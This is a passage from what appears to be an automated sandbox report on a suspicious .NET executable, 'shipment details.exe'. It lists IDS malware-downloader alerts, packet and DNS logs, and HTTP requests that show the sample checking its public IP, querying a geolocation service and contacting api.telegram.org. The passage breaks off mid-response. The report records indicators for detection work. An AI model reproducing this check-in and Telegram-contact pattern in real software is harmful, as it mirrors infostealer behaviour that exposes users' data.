                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_VERSION0x7a0a00x2fcdata0.43848167539267013
                                                                              RT_MANIFEST0x7a39c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                              DLLImport
                                                                              mscoree.dll_CorExeMain
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-08T18:21:05.525980+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704158.101.44.24280TCP
                                                                              2024-10-08T18:21:07.510383+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704158.101.44.24280TCP
                                                                              2024-10-08T18:21:08.091215+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549709188.114.97.3443TCP
                                                                              2024-10-08T18:21:08.729084+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549710158.101.44.24280TCP
                                                                              2024-10-08T18:21:09.602566+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549711188.114.97.3443TCP
                                                                              2024-10-08T18:21:12.107618+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549717188.114.97.3443TCP
                                                                              2024-10-08T18:21:14.310424+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549719188.114.97.3443TCP
                                                                              2024-10-08T18:21:19.864976+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549725188.114.97.3443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 8, 2024 18:21:04.705214024 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:04.710787058 CEST8049704158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:04.710863113 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:04.711076975 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:04.716695070 CEST8049704158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:05.303951025 CEST8049704158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:05.308419943 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:05.313448906 CEST8049704158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:05.475451946 CEST8049704158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:05.525979996 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:05.526587009 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:05.526676893 CEST44349707188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:05.530920982 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:05.535181046 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:05.535219908 CEST44349707188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:06.026674032 CEST44349707188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:06.026773930 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:06.044509888 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:06.044586897 CEST44349707188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:06.044863939 CEST44349707188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:06.088439941 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:06.177234888 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:06.223397017 CEST44349707188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:06.290568113 CEST44349707188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:06.290786982 CEST44349707188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:06.290880919 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:06.303925037 CEST49707443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:06.308073997 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:06.313513994 CEST8049704158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:07.465899944 CEST8049704158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:07.472021103 CEST49709443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:07.472070932 CEST44349709188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:07.472141027 CEST49709443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:07.472527981 CEST49709443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:07.472543955 CEST44349709188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:07.510382891 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:07.941854000 CEST44349709188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:07.945619106 CEST49709443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:07.945641994 CEST44349709188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:08.091114998 CEST44349709188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:08.091346025 CEST44349709188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:08.091593981 CEST49709443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:08.092055082 CEST49709443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:08.096729040 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:08.098229885 CEST4971080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:08.102382898 CEST8049704158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:08.102471113 CEST4970480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:08.103610992 CEST8049710158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:08.103709936 CEST4971080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:08.103815079 CEST4971080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:08.108691931 CEST8049710158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:08.685745001 CEST8049710158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:08.729084015 CEST4971080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:08.730359077 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:08.730387926 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:08.730446100 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:08.731211901 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:08.731225967 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:09.198494911 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:09.200201035 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:09.200263977 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:09.602545977 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:09.602637053 CEST44349711188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:09.602696896 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:09.603255033 CEST49711443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:09.608444929 CEST4971380192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:09.614036083 CEST8049713158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:09.614121914 CEST4971380192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:09.614213943 CEST4971380192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:09.619117975 CEST8049713158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:10.195403099 CEST8049713158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:10.196933985 CEST49715443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:10.196962118 CEST44349715188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:10.197021008 CEST49715443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:10.197366953 CEST49715443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:10.197382927 CEST44349715188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:10.244685888 CEST4971380192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:10.662523031 CEST44349715188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:10.663961887 CEST49715443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:10.663994074 CEST44349715188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:10.840635061 CEST44349715188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:10.840850115 CEST44349715188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:10.840902090 CEST49715443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:10.841550112 CEST49715443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:10.845222950 CEST4971380192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:10.846129894 CEST4971680192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:10.850946903 CEST8049713158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:10.851089954 CEST8049716158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:10.851136923 CEST4971380192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:10.851162910 CEST4971680192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:10.851270914 CEST4971680192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:10.856296062 CEST8049716158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:11.464623928 CEST8049716158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:11.465956926 CEST49717443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:11.466063976 CEST44349717188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:11.466159105 CEST49717443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:11.466393948 CEST49717443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:11.466420889 CEST44349717188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:11.510303974 CEST4971680192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:11.956882954 CEST44349717188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:11.958406925 CEST49717443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:11.958456993 CEST44349717188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:12.107431889 CEST44349717188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:12.107522964 CEST44349717188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:12.107633114 CEST49717443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:12.108040094 CEST49717443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:12.111613989 CEST4971680192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:12.112704992 CEST4971880192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:12.117541075 CEST8049716158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:12.117594004 CEST4971680192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:12.118336916 CEST8049718158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:12.118415117 CEST4971880192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:12.118496895 CEST4971880192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:12.124073029 CEST8049718158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:13.705847979 CEST8049718158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:13.707895994 CEST49719443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:13.707941055 CEST44349719188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:13.708141088 CEST49719443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:13.708369017 CEST49719443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:13.708395958 CEST44349719188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:13.760457993 CEST4971880192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:14.177417994 CEST44349719188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:14.180536032 CEST49719443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:14.180558920 CEST44349719188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:14.310419083 CEST44349719188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:14.310698032 CEST44349719188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:14.310817003 CEST49719443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:14.311270952 CEST49719443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:14.316106081 CEST4971880192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:14.317770004 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:14.321490049 CEST8049718158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:14.321578979 CEST4971880192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:14.322865963 CEST8049720158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:14.322940111 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:14.323060036 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:14.328229904 CEST8049720158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:14.911712885 CEST8049720158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:14.913882971 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:14.913971901 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:14.914230108 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:14.914545059 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:14.914634943 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:14.963476896 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.031490088 CEST8049720158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:16.031652927 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.032113075 CEST8049720158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:16.032174110 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.034037113 CEST8049720158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:16.034096956 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.039086103 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:16.041349888 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:16.041380882 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:16.179574013 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:16.179831982 CEST44349721188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:16.179910898 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:16.180224895 CEST49721443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:16.184192896 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.185322046 CEST4972280192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.189443111 CEST8049720158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:16.189522982 CEST4972080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.190299988 CEST8049722158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:16.190377951 CEST4972280192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.190490007 CEST4972280192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:16.195457935 CEST8049722158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:17.751296043 CEST8049722158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:17.752912045 CEST49723443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:17.752944946 CEST44349723188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:17.753004074 CEST49723443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:17.753349066 CEST49723443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:17.753360987 CEST44349723188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:17.791578054 CEST4972280192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:18.238470078 CEST44349723188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:18.240148067 CEST49723443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:18.240164995 CEST44349723188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:18.392690897 CEST44349723188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:18.392967939 CEST44349723188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:18.393079042 CEST49723443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:18.393374920 CEST49723443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:18.397001028 CEST4972280192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:18.398760080 CEST4972480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:18.402621984 CEST8049722158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:18.402692080 CEST4972280192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:18.403733015 CEST8049724158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:18.403812885 CEST4972480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:18.403886080 CEST4972480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:18.409152031 CEST8049724158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:19.013358116 CEST8049724158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:19.020797968 CEST49725443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:19.020905972 CEST44349725188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:19.020993948 CEST49725443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:19.021265984 CEST49725443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:19.021291018 CEST44349725188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:19.057207108 CEST4972480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:19.495693922 CEST44349725188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:19.497335911 CEST49725443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:19.497423887 CEST44349725188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:19.865035057 CEST44349725188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:19.865304947 CEST44349725188.114.97.3192.168.2.5
                                                                              Oct 8, 2024 18:21:19.865386963 CEST49725443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:19.866715908 CEST49725443192.168.2.5188.114.97.3
                                                                              Oct 8, 2024 18:21:19.933226109 CEST49727443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:19.933326006 CEST44349727149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:19.933413982 CEST49727443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:19.939507008 CEST49727443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:19.939552069 CEST44349727149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:19.952033043 CEST4972480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:19.957870007 CEST8049724158.101.44.242192.168.2.5
                                                                              Oct 8, 2024 18:21:19.957937956 CEST4972480192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:20.579505920 CEST44349727149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:20.579631090 CEST49727443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:20.581192970 CEST49727443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:20.581223011 CEST44349727149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:20.581557989 CEST44349727149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:20.582784891 CEST49727443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:20.627402067 CEST44349727149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:20.823173046 CEST44349727149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:20.823359966 CEST44349727149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:20.823436022 CEST49727443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:20.828133106 CEST49727443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:26.030330896 CEST4971080192.168.2.5158.101.44.242
                                                                              Oct 8, 2024 18:21:26.209170103 CEST62359443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:26.209206104 CEST44362359149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:26.209295988 CEST62359443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:26.209523916 CEST62359443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:26.209542990 CEST44362359149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:26.862757921 CEST44362359149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:26.872427940 CEST62359443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:26.872464895 CEST44362359149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:26.872859955 CEST62359443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:26.872867107 CEST44362359149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:27.276585102 CEST44362359149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:27.279094934 CEST44362359149.154.167.220192.168.2.5
                                                                              Oct 8, 2024 18:21:27.279162884 CEST62359443192.168.2.5149.154.167.220
                                                                              Oct 8, 2024 18:21:27.279438019 CEST62359443192.168.2.5149.154.167.220
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 8, 2024 18:21:04.687151909 CEST5397353192.168.2.51.1.1.1
                                                                              Oct 8, 2024 18:21:04.696827888 CEST53539731.1.1.1192.168.2.5
                                                                              Oct 8, 2024 18:21:05.511177063 CEST6108653192.168.2.51.1.1.1
                                                                              Oct 8, 2024 18:21:05.522891998 CEST53610861.1.1.1192.168.2.5
                                                                              Oct 8, 2024 18:21:19.920439005 CEST5628653192.168.2.51.1.1.1
                                                                              Oct 8, 2024 18:21:19.929059982 CEST53562861.1.1.1192.168.2.5
                                                                              Oct 8, 2024 18:21:24.111473083 CEST53504591.1.1.1192.168.2.5
                                                                              Oct 8, 2024 18:21:25.581006050 CEST53529941.1.1.1192.168.2.5
                                                                              Oct 8, 2024 18:21:27.697385073 CEST6190753192.168.2.51.1.1.1
                                                                              Oct 8, 2024 18:21:27.705954075 CEST53619071.1.1.1192.168.2.5
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 8, 2024 18:21:04.687151909 CEST192.168.2.51.1.1.10x1a3eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:05.511177063 CEST192.168.2.51.1.1.10x7b49Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:19.920439005 CEST192.168.2.51.1.1.10x189aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:27.697385073 CEST192.168.2.51.1.1.10x9661Standard query (0)56.163.245.4.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 8, 2024 18:21:04.696827888 CEST1.1.1.1192.168.2.50x1a3eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:04.696827888 CEST1.1.1.1192.168.2.50x1a3eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:04.696827888 CEST1.1.1.1192.168.2.50x1a3eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:04.696827888 CEST1.1.1.1192.168.2.50x1a3eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:04.696827888 CEST1.1.1.1192.168.2.50x1a3eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:04.696827888 CEST1.1.1.1192.168.2.50x1a3eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:05.522891998 CEST1.1.1.1192.168.2.50x7b49No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:05.522891998 CEST1.1.1.1192.168.2.50x7b49No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:19.929059982 CEST1.1.1.1192.168.2.50x189aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                              Oct 8, 2024 18:21:27.705954075 CEST1.1.1.1192.168.2.50x9661Name error (3)56.163.245.4.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                              • reallyfreegeoip.org
                                                                              • api.telegram.org
                                                                              • checkip.dyndns.org
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549704158.101.44.242804788C:\Users\user\Desktop\shipment details.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 8, 2024 18:21:04.711076975 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 8, 2024 18:21:05.303951025 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:05 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 63df5b6fe753c878e3b2aad364032d18
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 8, 2024 18:21:05.308419943 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 8, 2024 18:21:05.475451946 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:05 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 10b5ac212d20b0e6631f7ba9f63daca5
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 8, 2024 18:21:06.308073997 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 8, 2024 18:21:07.465899944 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 08 Oct 2024 16:21:07 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
